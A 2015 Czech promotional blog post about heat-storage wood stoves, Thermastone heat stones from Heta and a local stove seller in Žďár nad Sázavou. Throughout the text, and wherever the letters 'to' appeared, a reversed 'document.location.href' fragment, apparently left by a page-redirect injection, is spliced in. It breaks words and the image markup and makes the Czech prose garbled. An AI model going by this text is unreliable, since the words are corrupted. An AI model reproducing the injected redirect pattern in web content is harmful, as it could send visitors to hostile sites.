Rainbow page separator

Akumulační kamna moderního vzhledu a s výjimečnou účinností jsou trendem dnešní doby

Čtvrtek, 5. února 2015

Tepelné kameny Thermastone heta

Chcete být nezávislí na dodávkách tepelné energie? Kamna na dřevo vám [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to umožní a navíc vám zpříjemní chvíle pohody u domácího krbu. Přední výrobci na ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to požadavky reagují velmi kvalitními kamny s akumulací.

Akumulaci tvoří materiál a hmotnost kamen. Litina je velmi dobře zvolený materiál, ale pokud je hmotnost kamen pod 200 kg, nemůžeme mluvit o akumulaci nebo výhodě takových kamen. S mastkovými kamny je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to obdobné.

Akumulaci může tvořit i materiál vyrobený na bázi cementu s mimořádnou hus[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou akumulačních tvarovek.

Na výběru záleží. Pokud se ještě skloubí akumulace mastkem a kameny Thermas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tone, tak docílíme opravdu mimořádných tepelných zisků z každého kousku dřeva.

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tone-heta-kamnakrby-ok-michal-zatko-zdar-nad-sazavou.jpg“>[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tone heta “ alt=“Tepelné kameny Thermas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tone heta “ src=“https://www.zdarskypruvodce.cz/zpo/uploads/uploads/tepelne-kameny-thermas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tone-heta-kamnakrby-ok-michal-zatko-zdar-nad-sazavou-1024×576.jpg“ width=“295″ height=“166″ />Například tabulka firmy Heta ukazuje, jak [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topí stejná kamna bez tepelných kamenů a jak s tepelnými kameny. Podobný graf publikují i firmy, které se zabývají výrobou litinových kamen. Ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to kamna na obrázku váží 450 kg a jsou na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom s akumulací lépe než dobře.

.

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tone-heta-kamnakrby-ok-michal-zatko-zdar-nad-sazavou-akumulacni-kamna.jpg“>[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tone heta “ alt=“Tepelné kameny Thermas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tone heta “ src=“https://www.zdarskypruvodce.cz/zpo/uploads/uploads/tepelne-kameny-thermas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tone-heta-kamnakrby-ok-michal-zatko-zdar-nad-sazavou-akumulacni-kamna.jpg“ width=“170″ height=“362″ />Začínají [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topit prakticky ihned po rozhoření, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože umožňují využití konvenčních otvorů při natápění kamen, a po vyhasnutí hřejí mnoho hodin. Teplo se šíří příjemným hebkým teplem po celé místnosti. Vzduch se nepřepaluje a vy se cítíte jako za slunečného dne.

Prodej a montáž zajišťuje Michal Zaťko kamnakrbyok

  • Husova 12, Žďár nad Sáz. a
  • Humpolecká 402 Havlíčkův Brod – zde můžete vidět základní hořící model Heta Scan-Line 560 S

[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tone-heta-kamnakrby-ok-michal-zatko-zdar-nad-sazavou-akumulacni-kamna.jpg“>